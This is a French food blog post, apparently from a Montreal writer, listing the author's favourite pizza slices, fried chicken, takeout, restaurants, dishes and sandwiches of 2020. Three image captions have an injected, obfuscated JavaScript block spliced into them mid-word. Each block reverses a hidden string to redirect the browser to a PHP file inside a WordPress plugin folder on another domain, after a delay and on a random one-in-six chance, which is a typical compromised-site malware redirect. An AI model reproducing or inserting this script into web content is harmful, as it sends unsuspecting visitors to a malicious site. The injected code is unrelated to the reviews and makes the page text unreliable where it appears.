Palmarès 2020 : mes « best of » gastronomiques

spaghetti_homard_graziella_le_cuisinomane

Palmarès 2020 : mes « best of » gastronomiques

Avec quelques jours en retard comparativement aux dernières années, il est maintenant l’heure de vous partager mon palmarès 2020. Parce que oui, malgré la situation pandémique, je peux clairement affirmer qu’il s’est mangé bien de bonnes choses cette année. Une année où le poulet frit ne pourra passer sous le silence ; tout comme la pizza, la lasagne, la crème glacée, les sandwiches, le poulet frit (l’ais je déjà dit ?) et les créations disons… Un peu farfelu — pour le meilleur et pour le pire.

Ce palmarès est totalement personnel et selon mes goûts. Non, je n’ai pas goûté tous les poulets frits et les pizzas de Montréal (quoique…). Je n’ai non plus mis la main sur tous les délicieux sandwichs que les chefs ont créés — j’ai ici en tête Mitch Déli, les hoagies de Elena, les sandwichs du Pick-Up ou ceux de la Boucherie Lawrence. Mais, ce n’est pas parce que mon estomac a « chômé » !

Si vous êtes curieux, voici mon palmarès 2016, 2017, 2018 et 2019.

Place au palmarès 2020 !

gentile_pizza_parlour_le_cuisinomane
Gentile Pizza Parlour (optez davantage pour les pointes "NY style"
Meilleure slice

Gentile Pizza Parlour : Je pourrais manger une complète à moi seul. Optez pour les pizzas rouges (à base de sauce tomate).

Pizza Toni : La classique au fromage. Si peppéroni, assurez-vous d’aimer le peppéroni et demandez extra sauce ranch.

San Gennaro : Pizza patate FTW. Encore une fois la dernière fois, j’ai eu la chair de poule.

Morso : Deux petites slices aériennes comme des oreillers, olives, charcuteries et voici l’apéro parfait. Ma préférée, Margherita avec straciatella maison.

 

Non, 2020 n’aura pas été l’année des pizzas napolitaines ! Si vous voulez tout de même savoir quelles sont mes préférées, voici ma liste. Néanmoins, ma meilleure fut la mortadelle et pistache du chef Érik Mandracchia au Giulietta, situé au Marché Central.

pizza_san_gennaro_le_cuisinomane
La fameuse ! - San Gennaro
Meilleur poulet frit

Aucun ne remporte la palme d’or – je n’ai trouvé la totale perfection dans aucun. Néanmoins, voici :

Meilleure panure : Casgrain BBQ

Meilleur assaisonnement : Rubie’s

Meilleur sandwich : Chikin et Bucky Rooster’s

bucky_rooster_le_cuisinomane
Mon expérience avec le sceau de poulet ne fut pas optimale, mais le s<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>andwich était très bon ! (Bucky Rooster)
À emporter mémorables

Knuckles : Pour moi, l’ouverture de 2020. De petits plats simples et bien exécutés, sans oublier les dodus panzerotti. À deux ou trois personnes, on n’hésite pas à commander le menu en entier.

Ikanos : Yuno, Kefi ou Ikanos. Trois entités, une seule cuisine. Aucun mauvais choix !

O’Thym : On ne se lasse pas d’une cuisine de saison à la fois créative, moderne et surtout de bon goût.

Le Mousso : Le menu végétarien était absolument fabuleux. Je n’ai aucun doute que les autres l’étaient tout autant !

Hoogan et Beaufort : La cuisine créative et parfaitement maîtrisée du chef Jetté, directement à la maison. Quand la qualité et le savoir-faire n’ont pas de prix !

Trifecta : Le meilleur du Club Chasse et Pêche, Le Serpent, Le Filet et Il Miglio ; difficile de demander mieux.

knuckles_villeray_le_cuisinomane
Menu au Knuckles
Repas assis mémorables

H4C par Dany Bolduc : Oh oui. Cet endroit… à la folie ! Lire l’une de mes expériences, ici.

Pastel : Avec le chef Yoann et sa jeune équipe dynamique, le Pastel n’aura jamais été autant entre de bonnes mains. Une soirée inoubliable.

Maison Publique : Une cuisine si bien maîtrisée, à leur image. Assurez-vous de garder un peu d’appétit pour le gâteau au chocolat en dessert — le meilleur mangé à ce jour.

Club Chasse et Pêche : Un autre repas mémorable d’avant confinement… Vous savez, « dans le bon vieux temps ». À lire ici.

Le Norest : Un jeune chef qui n’a pas froid aux yeux et qui n’a pas peur de briser les conventions. C’est beau à voir — et délicieux dans l’assiette.

Boulangerie Merci la vie (la nuit) : Les pizzas, les petits plats de saison, la terrasse extérieure… Une soirée magique et parfaite.

 

À l’extérieur de Montréal, trois restaurants sont dignes de mention : ARVI (Québec), Alice (Ottawa) et Langdon Hall (Ontario). Trois repas absolument phénoménaux qui méritent définitivement votre attention si vous êtes de passage dans ces villes.

homard_h4c_restaurant
Homard et muhammara - Restaurant H4C par Dany Bolduc
Plats de l’année

Spaghetti au homard de Graziella : spaghetti al dente, bisque légèrement tomatée, du homard en grande quantité… Oui oui, pour moi, meilleur que celui-là, là…

Homard et muhammara du H4C par Dany Bolduc : un plat qui m’a mis dans tous ces états… ! Son parfum… Sa délicatesse… Mémorable.

« Toast » aux chanterelles de la MaisonPublique : Oh wow. Rien à rajouter.

Cavatelli aux morilles, émulsion d’échalotes Saint-Anne : Plat dégusté au ARVI, à Québec. Pâtes maison, morilles, échalotes Saint-Anne (variété du Québec caractérisée par sa sucrosité) travaillées en deux façons — et un peu de beurre. Rien de plus, rien de moins.

spaghetti_homard_graziella_le_cuisinomane
Spaghetti au homard - Graziella
tartine_chanterelles_maison_publique
Oh comment magnifique cette tartine aux chanterelles de la Maison Publique !
Sandwichs de l’année

Sandwich déjeuner — SuWu : Tous les essentiels du matin amalgamés avec leur sauce maison, puis réunis dans un pain moelleux et tout chaud. Un must.

Sandwich à la pieuvre – La Panzeria : Le meilleur sandwich à la pieuvre à l’ouest de Bari ! Pieuvre légèrement frite, burrata crémeuse et rapini, dans un pain italien.

Sandwich au poulet frit épicé de Chikin (Cathcart) : Dégusté en janvier 2020 à l’ouverture de la halle gastronomique Le Cathcart et je m’en souviens encore ! Ce pain au patate… Le poulet frit à deux reprises… La sauce légèrement épicée… Parfaitement balancé et exquis.

Mention également à celui du Bucky Rooster’s.

sandwich_pieuvre_panzeria_montreal
S<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>andwich à la pieuvre de La Panzeria
Autres nouveautés 2020 dignes de mention

Chef Laksimi : Un jeune chef passionné et motivé qui arrive tout droit de l’école « Bonci » à Rome. Il a certes la tête remplie d’idée, mais surtout les connaissances et le savoir-faire. Une étoile montante : vous risquez d’en entendre parler davantage dans les années qui suivent.

ÔFauria : Le Meilleur Ouvrier de France Christian Faure qui ne recule devant rien et ouvre sa pâtisserie entièrement en ligne, et ce, quelques semaines après avoir frôler la mort et une dissociation avec Maison Christian Faure. Résilience, combattant, passionné. La pâtisserie française à son meilleur !

Café Téta : Les manouches… La salade fattouche (la meilleure !)… Le brownie halva… Allez-y vite, on adore !

Maison Bonbec : Le maître dans la brioche aux pralines lyonnaises ! En plus d’être l’un des seuls à Montréal à confectionner des pralines lyonnaises, Loïc se consacre presqu’exclusivement à l’élaboration son produit phare : la brioche « Rose Bonbec ». À noter que ses babkas sont également dignes de mention.

Les scones de Blés de Pays : Si vous ne connaissez pas Maxime, le boulanger derrière Blés de Pays, je vous invite fortement à lire ceci. Puis, si je vous disais qu’il s’est lancé dans la confection de scone au levain ; et que surtout, ces derniers passent le test… Qu’attendez-vous ?

Bar Verdun : Une très belle découverte de l’été 2020 ! En plus d’y boire très bien (hello vins nature), on y mange aussi très bien. Mention pour le poulet frit avec sauce ranch.

OMLTLe chef Tigreton (maître de la croquetas), a tout récemment lancé un autre mono produit qu’il a baptisé OMLT. Une tortilla espagnole de 1KG comme vous ne l’aurez jamais vu !

maison_bonbec_montreal
Moi qui s'exclame face à la magnifique brioche aux pralines lyonnaises de Maison Bonbec
pizza_toni_le_cuisinomane
Pizza Toni - doublez le plaisir en dem<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script>andant un extra sauce ranch
bar_verdun_beach
Superbe soirée au Bar Verdun Beach
No Comments

Post A Comment